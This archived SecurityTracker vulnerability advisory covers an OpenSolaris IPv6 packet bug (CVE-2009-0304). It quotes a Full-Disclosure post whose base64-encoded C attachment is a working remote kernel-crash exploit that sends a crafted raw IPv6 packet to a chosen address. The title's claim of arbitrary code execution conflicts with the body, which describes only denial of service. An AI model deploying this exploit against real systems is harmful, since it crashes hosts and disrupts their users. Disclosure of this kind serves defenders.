SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   OS (UNIX)  >   Solaris Vendors:   Sun
Solaris Bug in Processing IPv6 Packets Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1021635
SecurityTracker URL:  http://securitytracker.com/id/1021635
CVE Reference:   CVE-2009-0304   (Links to External Site)
Updated:  Jan 29 2009
Original Entry Date:  Jan 26 2009
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): OpenSolaris; possibly other versions
Description:   A vulnerability was reported in Solaris. A remote user can cause denial of service conditions.

A remote user can send a specially crafted IPv6 packet to cause the target system to crash.

Kingcope reported this vulnerability.

Impact:   A remote user can cause the target system to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.sun.com/ (Links to External Site)
Cause:   Exception handling error
Underlying OS:  

Message History:   None.


 Source Message Contents

Date:  Mon, 26 Jan 2009 08:23:45 +0100
Subject:  [Full-disclosure] Solaris Devs Are Smoking Pot

--001636c5a5d87c6de504615d9e3f
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit

Regards,
2009/Kingcope

--001636c5a5d87c6de504615d9e3f
Content-Type: text/x-csrc; charset=US-ASCII; name="SunOSipv6.c"
Content-Disposition: attachment; filename="SunOSipv6.c"
Content-Transfer-Encoding: base64
X-Attachment-Id: f_fqetai7i0

LyoKCVN1bk9TIFJlbGVhc2UgNS4xMSBWZXJzaW9uIHNudl8xMDFiIFJlbW90ZSBJUFY2IAoJS2Vy
bmVsIENyYXNoIEV4cGxvaXQgMGRheQoJQnkgS2luZ2NvcGUvMjAwOQoqLwoKI2luY2x1ZGUgPHN0
ZGlvLmg+CiNpbmNsdWRlIDxzdHJpbmcuaD4KI2luY2x1ZGUgPHN0ZGxpYi5oPgojaW5jbHVkZSA8
bmV0aW5ldC9pbi5oPgojaW5jbHVkZSA8bmV0ZGIuaD4KI2luY2x1ZGUgPHN5cy90aW1lLmg+CiNp
bmNsdWRlIDxzeXMvdHlwZXMuaD4KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4KI2luY2x1ZGUgPGFy
cGEvaW5ldC5oPgojaW5jbHVkZSA8dW5pc3RkLmg+Cgp1bnNpZ25lZCBjaGFyIHJhd0RhdGFbXSA9
CiJceDYwXHhmY1x4NTdceDI5XHgwMFx4MDBceDNjXHg1Nlx4NmZceDM1XHg0MFx4NzJceDcwXHgy
Zlx4NTJceDU4IgoiXHhjY1x4OTVceDEyXHg3OVx4MzBceGJiXHhiZVx4MjVceGZlXHg4MFx4MDBc
eDAwXHgwMFx4MDBceDAwXHgwMCIKIlx4MDJceDBjXHgyOVx4ZmZceGZlXHhmMVx4MWVceGJiIjsK
CmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pCnsKICBzdHJ1Y3Qgc29ja2FkZHJfaW42
IGRzdDsKICBpbnQgczsKCiAgaWYgKGFyZ2MgPCAyKQogIHsKICAgIHByaW50ZigiU3VuT1MgUmVs
ZWFzZSA1LjExIFZlcnNpb24gc252XzEwMWIgUmVtb3RlIElQVjYgS2VybmVsIENyYXNoIEV4cGxv
aXQgMGRheSBCeSBLaW5nY29wZS8yMDA5XG4iKTsKICAgIHByaW50ZigiVXNhZ2U6ICVzIDxkc3Q+
XG4iLCAqYXJndik7CiAgICByZXR1cm4oMSk7CiAgfQoKICBtZW1zZXQoJmRzdCwgMCwgc2l6ZW9m
KGRzdCkpOwogIGlmIChpbmV0X3B0b24oQUZfSU5FVDYsIChjaGFyICopYXJndlsxXSwgKHN0cnVj
dCBpbjZfYWRkciAqKSAmZHN0LnNpbjZfYWRkcikgIT0gMSkgewoJcHJpbnRmKCJFcnJvcjogaW5l
dF9wdG9uKClcbiIpOwoJZXhpdCgtMSk7Cgl9CgltZW1jcHkocmF3RGF0YSsyNCwgJmRzdC5zaW42
X2FkZHIsIDE2KTsKCiAgZHN0LnNpbjZfZmFtaWx5ID0gQUZfSU5FVDY7CgogIHMgPSBzb2NrZXQo
QUZfSU5FVDYsIFNPQ0tfUkFXLCBJUFBST1RPX1JBVyk7CiAgaWYgKHMgPT0gLTEpCiAgICByZXR1
cm4oMSk7CgogIHByaW50ZigiU2VuZGluZyBJUFY2IHBhY2tldDogJXNcbiIsIGFyZ3ZbMV0pOwoK
ICBpZiAoc2VuZHRvKHMsJnJhd0RhdGEsc2l6ZW9mKHJhd0RhdGEpLDAsKHN0cnVjdCBzb2NrYWRk
ciopJmRzdCxzaXplb2YoZHN0KSkgPT0gLTEpCiAgewoJcGVycm9yKCJFcnJvciBzZW5kaW5nIHBh
Y2tldCIpOwoJZXhpdCgtMSk7CiAgfQoKICByZXR1cm4oMCk7Cn0KCi8qCktlcm5lbCBDcmFzaCBE
dW1wIE1heSBMb29rIExpa2UgVGhlIEZvbGxvd2luZyBTbmlwcGV0CltJRCA5NjUzMzIga2Vybi5u
b3RpY2VdIGlwc2VjX25lZWRzX3Byb2Nlc3NpbmdfdjYKW0lEIDEwMDAwMCBrZXJuLm5vdGljZV0K
W0lEIDY1NTA3MiBrZXJuLm5vdGljZV0gZmZmZmZmMDAwMTJiOTY1MCBpcDppcHNlY19uZWVkc19w
cm9jZXNzaW5nX3Y2KzEwYyAoKQpbSUQgNjU1MDcyIGtlcm4ubm90aWNlXSBmZmZmZmYwMDAxMmI5
NmYwIGlwOmlwc2VjX2Vhcmx5X2FoX3Y2Kzc1ICgpCltJRCA2NTUwNzIga2Vybi5ub3RpY2VdIGZm
ZmZmZjAwMDEyYjk4NjAgaXA6aXBfcnB1dF9kYXRhX3Y2K2Y0ZSAoKQpbSUQgNjU1MDcyIGtlcm4u
bm90aWNlXSBmZmZmZmYwMDAxMmI5OTQwIGlwOmlwX3JwdXRfdjYrNjRlICgpCltJRCA2NTUwNzIg
a2Vybi5ub3RpY2VdIGZmZmZmZjAwMDEyYjk5YjAgdW5peDpwdXRuZXh0KzIxZSAoKQpbSUQgNjU1
MDcyIGtlcm4ubm90aWNlXSBmZmZmZmYwMDAxMmI5YTAwIGRsZDpkbGRfc3RyX3J4X2Zhc3RwYXRo
KzhhICgpCltJRCA2NTUwNzIga2Vybi5ub3RpY2VdIGZmZmZmZjAwMDEyYjlhZDAgZGxzOmlfZGxz
X2xpbmtfcngrMmM3ICgpCltJRCA2NTUwNzIga2Vybi5ub3RpY2VdIGZmZmZmZjAwMDEyYjliNTAg
bWFjOm1hY19kb19yeCtiNyAoKQpbSUQgNjU1MDcyIGtlcm4ubm90aWNlXSBmZmZmZmYwMDAxMmI5
YjgwIG1hYzptYWNfcngrMWYgKCkKW0lEIDY1NTA3MiBrZXJuLm5vdGljZV0gZmZmZmZmMDAwMTJi
OWJkMCBlMTAwMGc6ZTEwMDBnX2ludHIrMTM1ICgpCltJRCA2NTUwNzIga2Vybi5ub3RpY2VdIGZm
ZmZmZjAwMDEyYjljMjAgdW5peDphdl9kaXNwYXRjaF9hdXRvdmVjdCs3YyAoKQpbSUQgNjU1MDcy
IGtlcm4ubm90aWNlXSBmZmZmZmYwMDAxMmI5YzYwIHVuaXg6ZGlzcGF0Y2hfaGFyZGludCszMyAo
KQpbSUQgNjU1MDcyIGtlcm4ubm90aWNlXSBmZmZmZmYwMDAxMmM1ODcwIHVuaXg6c3dpdGNoX3Nw
X2FuZF9jYWxsKzEzICgpCltJRCA2NTUwNzIga2Vybi5ub3RpY2VdIGZmZmZmZjAwMDEyYzU4YzAg
dW5peDpkb19pbnRlcnJ1cHQrOWUgKCkKW0lEIDY1NTA3MiBrZXJuLm5vdGljZV0gZmZmZmZmMDAw
MTJjNThkMCB1bml4OmNtbmludCtiYSAoKQpbSUQgNjU1MDcyIGtlcm4ubm90aWNlXSBmZmZmZmYw
MDAxMmM1YTAwIHVuaXg6ZGRpX21lbV9wdXRiK2YgKCkKW0lEIDY1NTA3MiBrZXJuLm5vdGljZV0g
ZmZmZmZmMDAwMTJjNWE0MCBhdGE6YXRhX2Rpc2tfc3RhcnRfZG1hX291dCs4OCAoKQpbSUQgNjU1
MDcyIGtlcm4ubm90aWNlXSBmZmZmZmYwMDAxMmM1YTkwIGF0YTphdGFfY3Rscl9mc20rMWZiICgp
CltJRCA2NTUwNzIga2Vybi5ub3RpY2VdIGZmZmZmZjAwMDEyYzVhZjAgYXRhOmF0YV9oYmFfc3Rh
cnQrODQgKCkKW0lEIDY1NTA3MiBrZXJuLm5vdGljZV0gZmZmZmZmMDAwMTJjNWIzMCBhdGE6Z2hk
X3dhaXRxX3Byb2Nlc3NfYW5kX211dGV4X2hvbGQrZGYgKCkKW0lEIDY1NTA3MiBrZXJuLm5vdGlj
ZV0gZmZmZmZmMDAwMTJjNWJhMCBhdGE6Z2hkX2ludHIrOGQgKCkKW0lEIDY1NTA3MiBrZXJuLm5v
dGljZV0gZmZmZmZmMDAwMTJjNWJkMCBhdGE6YXRhX2ludHIrMjcgKCkKW0lEIDY1NTA3MiBrZXJu
Lm5vdGljZV0gZmZmZmZmMDAwMTJjNWMyMCB1bml4OmF2X2Rpc3BhdGNoX2F1dG92ZWN0KzdjICgp
CltJRCA2NTUwNzIga2Vybi5ub3RpY2VdIGZmZmZmZjAwMDEyYzVjNjAgdW5peDpkaXNwYXRjaF9o
YXJkaW50KzMzICgpCltJRCA2NTUwNzIga2Vybi5ub3RpY2VdIGZmZmZmZjAwMDEyMDVhYjAgdW5p
eDpzd2l0Y2hfc3BfYW5kX2NhbGwrMTMgKCkKW0lEIDY1NTA3MiBrZXJuLm5vdGljZV0gZmZmZmZm
MDAwMTIwNWIwMCB1bml4OmRvX2ludGVycnVwdCs5ZSAoKQpbSUQgNjU1MDcyIGtlcm4ubm90aWNl
XSBmZmZmZmYwMDAxMjA1YjEwIHVuaXg6Y21uaW50K2JhICgpCltJRCA2NTUwNzIga2Vybi5ub3Rp
Y2VdIGZmZmZmZjAwMDEyMDVjMDAgdW5peDptYWNoX2NwdV9pZGxlK2IgKCkKW0lEIDY1NTA3MiBr
ZXJuLm5vdGljZV0gZmZmZmZmMDAwMTIwNWM0MCB1bml4OmNwdV9pZGxlKzE3YiAoKQpbSUQgNjU1
MDcyIGtlcm4ubm90aWNlXSBmZmZmZmYwMDAxMjA1YzYwIHVuaXg6aWRsZSs0YyAoKQpbSUQgNjU1
MDcyIGtlcm4ubm90aWNlXSBmZmZmZmYwMDAxMjA1YzcwIHVuaXg6dGhyZWFkX3N0YXJ0KzggKCkK
W0lEIDEwMDAwMCBrZXJuLm5vdGljZV0KW0lEIDY3Mjg1NSBrZXJuLm5vdGljZV0gc3luY2luZyBm
aWxlIHN5c3RlbXMuLi4KW0lEIDkwNDA3MyBrZXJuLm5vdGljZV0gIGRvbmUKW0lEIDExMTIxOSBr
ZXJuLm5vdGljZV0gZHVtcGluZyB0byAvZGV2L3p2b2wvZHNrL3Jwb29sL2R1bXAsIG9mZnNldCA2
NTUzNiwgY29udGVudDoga2VybmVsCltJRCA0MDkzNjgga2Vybi5ub3RpY2VdIF5NMTAwJSBkb25l
OiA1NjcyNiBwYWdlcyBkdW1wZWQsIGNvbXByZXNzaW9uIHJhdGlvIDMuNTksCltJRCA4NTE2NzEg
a2Vybi5ub3RpY2VdIGR1bXAgc3VjY2VlZGVkCltJRCA1NDA1MzMga2Vybi5ub3RpY2VdIF5NU3Vu
T1MgUmVsZWFzZSA1LjExIFZlcnNpb24gc252XzEwMWIgNjQtYml0CltJRCAxNzI5MDgga2Vybi5u
b3RpY2VdIENvcHlyaWdodCAxOTgzLTIwMDggU3VuIE1pY3Jvc3lzdGVtcywgSW5jLiAgQWxsIHJp
Z2h0cyByZXNlcnZlZC4KKi8K
--001636c5a5d87c6de504615d9e3f
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--001636c5a5d87c6de504615d9e3f--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC